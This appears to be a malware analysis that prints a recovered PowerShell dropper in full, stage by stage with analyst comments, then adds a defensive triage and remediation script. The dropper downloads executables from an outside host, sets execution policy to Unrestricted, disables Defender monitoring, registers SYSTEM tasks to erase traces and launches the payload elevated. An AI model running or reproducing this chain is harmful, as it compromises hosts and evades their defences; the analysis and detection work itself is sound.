# Dropper / loader script as recovered. Stages 1-7 below are the sample's own numbering; the
# analyst comments describe what each stage does. Every call suppresses errors so that a failed
# step never stops the chain. The script requires an elevated session: Set-ExecutionPolicy at
# LocalMachine scope, Set-MpPreference and SYSTEM scheduled tasks all fail without it.

#1 Create the staging directory.
New-Item -Path "C:\Users\1" -ItemType Directory -Force -ErrorAction SilentlyContinue

#2 Fetch the payloads over plain HTTP from the staging host. aria2c.exe and 7zr.exe are
# legitimate tools (downloader and 7-Zip extractor) dropped alongside the launcher; the two
# commented-out lines show an earlier variant that also pulled an archive and a second binary.
Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/aria2c.exe" -OutFile "C:\Users\1\aria2c.exe" -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/launcher.exe" -OutFile "C:\Users\1\launcher.exe" -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/7zr.exe" -OutFile "C:\Users\1\7zr.exe" -ErrorAction SilentlyContinue
#Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/1.7z" -OutFile "C:\Users\1\1.7z" -ErrorAction SilentlyContinue
#Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/1.exe" -OutFile "C:\Users\1\1.exe" -ErrorAction SilentlyContinue

#3 Open the execution policy at machine scope, and register a SYSTEM task that puts the
# original policy back 30 minutes later so the change is short-lived. $currentPolicy is
# expanded into the task argument string at registration time.
$currentPolicy = Get-ExecutionPolicy -Scope LocalMachine
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope LocalMachine -Force -ErrorAction SilentlyContinue
$Action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-NoExit -Command Set-ExecutionPolicy -ExecutionPolicy $currentPolicy -Scope LocalMachine -Force"
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(30)
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
Register-ScheduledTask -TaskName "RestoreExecutionPolicy" -Action $Action -Principal $Principal -Trigger $Trigger -Description "Restores the execution policy after 30 minutes" -ErrorAction SilentlyContinue

#4 Turn off Defender real-time monitoring if it is on. With Tamper Protection enabled this
# Set-MpPreference call is rejected, and the error is swallowed.
try {
    $defenderStatus = Get-MpPreference | Select-Object -ExpandProperty DisableRealtimeMonitoring -ErrorAction Stop
} catch {
    $defenderStatus = $null
}
if (-not $defenderStatus) {
    try {
        Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
    } catch { }
}

#5 Anti-forensics: a second SYSTEM task deletes the staging directory after 1800 seconds
# (the same 30-minute window as stage 3) and then unregisters itself.
Unregister-ScheduledTask -TaskName "DeleteFolderTask" -Confirm:$false -ErrorAction SilentlyContinue
$Action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-NoExit -Command Remove-Item -Path 'C:\Users\1' -Recurse -Force; Unregister-ScheduledTask -TaskName 'DeleteFolderTask' -Confirm:$false"
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddSeconds(1800)
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
Register-ScheduledTask -TaskName "DeleteFolderTask" -Action $Action -Principal $Principal -Trigger $Trigger -Description "Deletes C:\Users\1 after 1800 seconds" -ErrorAction SilentlyContinue

#6 Check-in: an empty POST to the staging host, most likely an install counter, output discarded.
Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/1_data.php" -Method POST | Out-Null -ErrorAction SilentlyContinue

#7 Launch the downloaded payload elevated.
Start-Process "C:\Users\1\launcher.exe" -Verb RunAs -ErrorAction SilentlyContinue
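Host triage for this dropper, as an added example that is not part of the recovered sample. It checks for every artifact the seven stages above leave behind: the staging directory and its binaries, the two SYSTEM scheduled tasks, the Unrestricted machine-scope execution policy, disabled Defender real-time monitoring, and PowerShell script block log entries (event 4104) that mention the staging domain or task names. The indicator values (paths, task names, domain, file names) are taken from the script above; everything else is an assumption: the script is run elevated on the suspect host, script block logging is enabled, and the `-Remediate` switch and the RemoteSigned policy it restores are this example's choices, since the sample does not record what the original policy was.

```powershell
# Triage for the cici.tbnc.cn dropper. Added example, not the sample's own code.
# Assumes: elevated session; PowerShell script block logging (4104) enabled; Defender cmdlets present.
param([switch]$Remediate)   # -Remediate is this example's own switch, not something the dropper offers

$StagingDir   = 'C:\Users\1'
$TaskNames    = @('RestoreExecutionPolicy', 'DeleteFolderTask')
$Domain       = 'cici.tbnc.cn'
$DroppedFiles = @('aria2c.exe', 'launcher.exe', '7zr.exe', '1.7z', '1.exe')

$findings = [System.Collections.Generic.List[string]]::new()

# 1. Staging directory and dropped binaries. Stage 5 deletes the directory after 30 minutes,
#    so its absence does not prove a clean host; hash anything that is still there.
if (Test-Path -LiteralPath $StagingDir) {
    $findings.Add("Staging directory present: $StagingDir")
    Get-ChildItem -LiteralPath $StagingDir -File -ErrorAction SilentlyContinue |
        Where-Object { $DroppedFiles -contains $_.Name } |
        ForEach-Object {
            $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            $findings.Add("Dropped file: $($_.FullName) SHA256=$hash")
        }
}

# 2. Scheduled tasks registered by stages 3 and 5 (both run as SYSTEM).
foreach ($name in $TaskNames) {
    $task = Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue
    if ($task) {
        $taskArgs = ($task.Actions | ForEach-Object { $_.Arguments }) -join ' '
        $findings.Add("Scheduled task '$name' (user: $($task.Principal.UserId)) args: $taskArgs")
    }
}

# 3. Execution policy tampering from stage 3.
if ((Get-ExecutionPolicy -Scope LocalMachine) -eq 'Unrestricted') {
    $findings.Add('LocalMachine execution policy is Unrestricted')
}

# 4. Defender real-time monitoring turned off by stage 4.
try {
    if ((Get-MpPreference -ErrorAction Stop).DisableRealtimeMonitoring) {
        $findings.Add('Defender real-time monitoring is disabled')
    }
} catch {
    $findings.Add("Could not query Defender preferences: $($_.Exception.Message)")
}

# 5. Script block logs that reference the staging domain or the task names. The dropper's
#    own cleanup does not touch the event log, so this survives the 30-minute window.
$filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
$events = Get-WinEvent -FilterHashtable $filter -MaxEvents 5000 -ErrorAction SilentlyContinue
$hits = 0
foreach ($e in $events) {
    $msg = $e.Message
    if ($msg -match [regex]::Escape($Domain) -or ($TaskNames | Where-Object { $msg -match $_ })) {
        $hits++
        if ($hits -le 5) { $findings.Add("4104 at $($e.TimeCreated) matches dropper indicators") }
    }
}
if ($hits -gt 5) { $findings.Add("... and $($hits - 5) more matching 4104 events") }

if ($findings.Count -eq 0) {
    Write-Output 'No dropper indicators found.'
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
}

# Optional remediation. Files are left in place on purpose: collect them (and the 4104 events)
# before anything is deleted. RemoteSigned is an assumed baseline; use your own if it differs.
if ($Remediate -and $findings.Count -gt 0) {
    foreach ($name in $TaskNames) {
        Unregister-ScheduledTask -TaskName $name -Confirm:$false -ErrorAction SilentlyContinue
    }
    Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue
    Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope LocalMachine -Force
    Write-Output 'Remediation applied: tasks removed, real-time monitoring on, policy RemoteSigned.'
}
```

Save the block as a .ps1 and run it from an elevated prompt; add `-Remediate` only after the staging directory and event log have been preserved. The 4104 check is the most durable indicator here, because the sample's own cleanup removes the folder and the `DeleteFolderTask` task but never clears the log, and the `RestoreExecutionPolicy` task stays registered after it has fired.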